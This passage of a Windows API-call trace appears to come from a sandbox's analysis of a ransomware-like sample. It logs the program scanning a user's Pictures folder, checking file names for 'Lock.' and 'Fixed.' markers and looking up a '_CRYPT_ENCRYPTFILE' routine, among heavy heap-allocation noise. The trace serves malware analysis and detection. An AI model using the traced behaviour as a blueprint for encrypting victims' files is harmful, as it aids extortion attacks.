HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x2e58910 [0253.264] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/SWfcb.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\SWfcb.jpg", lpFilePart=0x8cf650*="SWfcb.jpg") returned 0x22 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0253.264] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SWfcb.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\swfcb.jpg")) returned 0xffffffff [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0253.264] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0253.264] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.264] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0253.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0253.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T9bmRc0wgjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9bmRc0wgjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmRc0wgjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mRc0wgjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rc0wgjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0wgjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0wgjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gjLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LMG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MG_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0253.266] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0253.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0253.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0253.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0253.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x977cc8 [0253.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0253.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T9bmRc0wgjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9bmRc0wgjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmRc0wgjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mRc0wgjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rc0wgjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0wgjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0wgjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gjLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LMG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MG_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G_.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0253.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0253.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0253.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0253.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0253.268] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0253.268] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0253.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0253.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0253.268] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0253.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0253.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0253.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0253.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0253.269] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0253.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0253.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0253.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0253.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0253.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0253.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0253.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0253.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0253.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0253.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0253.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0253.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0253.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0253.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0253.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0253.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0253.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0253.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0253.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0253.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0253.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0253.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0253.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0253.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, 